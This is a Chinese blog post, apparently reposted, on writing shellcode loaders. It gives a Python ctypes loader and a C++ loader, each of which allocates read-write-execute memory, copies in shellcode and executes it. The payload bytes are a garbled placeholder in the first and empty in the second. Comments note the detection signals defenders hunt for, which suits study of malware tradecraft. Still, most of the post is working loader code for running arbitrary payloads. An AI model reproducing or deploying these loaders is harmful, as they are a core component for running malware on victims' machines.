shellcode加载器编写

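Python3 shellcode 通用加载器（仅适用于 Windows：通过 ctypes 依次调用 kernel32 的 VirtualAlloc、RtlMoveMemory、CreateThread、WaitForSingleObject；这一调用序列以及同时可写可执行的内存页，是终端防护产品常见的检测点）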

#!/usr/bin/python3
import ctypes

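# Payload bytes go here. The literal is reproduced exactly as it appears on
# the page and serves only as a sample placeholder.
c = b"xfcxe8x89x00x00x00x60x89xe5x31"
shellcode = bytearray(c)

# Defender's view: everything below is the allocate -> copy -> new-thread
# sequence run inside the interpreter process. A python.exe making these
# kernel32 calls, with a thread starting in private (non-image) memory, is
# a strong hunting signal.

# Allocate a region sized to the payload.
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE; memory
# that is writable and executable at once is what memory scanners look for.
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))

# Expose the bytearray as a ctypes char array so it can be passed as the copy source.
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

# Copy the payload bytes into the allocated region.
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))

# Start a thread whose entry point is the allocated region (third argument).
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))

# Block until that thread exits; -1 is the INFINITE timeout.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))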

C++ 加载器（用 VirtualAlloc 申请 PAGE_EXECUTE_READWRITE 内存，memcpy 拷贝后在主线程中以函数指针方式直接调用）

#include <Windows.h>
#include <stdio.h>
using namespace std;
#pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"")
#pragma comment(linker, "/INCREMENTAL:NO")

// Entry point of the sample: copies the ShellCode array into freshly
// allocated executable memory and calls it as a function on the main thread.
// argc and argv are not used.
//
// Defender's view: a PAGE_EXECUTE_READWRITE private allocation followed by a
// call into it is the behaviour memory scanners and EDR hooks on VirtualAlloc
// are built to catch.
int main(int argc, char** argv) {
    // Payload buffer. It is empty on the page, so the array holds only the
    // terminating NUL byte of the string literal.
    unsigned char ShellCode[] = "";
    const size_t payloadSize = sizeof ShellCode;

    // Committed region, readable, writable and executable at once.
    // NOTE(review): the return value is not checked before use.
    void* region = VirtualAlloc(0, payloadSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(region, ShellCode, payloadSize);

    // Treat the region as a void(void) function and call it directly.
    void (*entry)() = (void(*)())region;
    entry();

    return 0;
}
原文地址:https://www.cnblogs.com/miruier/p/14034247.html